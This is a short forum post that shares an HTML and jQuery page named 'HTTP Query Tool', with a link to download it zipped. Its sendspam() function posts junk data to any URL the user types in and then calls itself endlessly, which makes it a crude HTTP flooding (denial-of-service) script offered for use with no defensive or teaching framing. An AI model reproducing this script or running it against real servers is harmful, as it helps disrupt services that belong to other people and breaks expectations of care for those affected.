Group: User Level:
Posts: 274 Joined: 9/20/2020 IP-Address: saved
|
<html> <head> <title>HTTP Query Tool</title> <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script> </head> <body> <br><br><br> <center> <h3>Fill the IP...</h3> <table> <tr><td> IP : </td><td><input type="text" id="yourname" placeholder="http://127.0.0.1"></td></tr> <tr><td></td><td><input type="submit" name="send" value="Send!" style="width: 100%" onclick="sendspam()"> <script> function sendspam() { var yourname = document.getElementById("yourname").value; if (yourname == "") {alert('Type something!');return false;} var dataString = "crap"; $.ajax({type: "POST", url: ""+yourname+"", data: dataString, cache: false,}); sendspam(); } </script>
Download: (HTTP Query Tool zipped) https://uploadrar.com/cyjk8uhjziec
|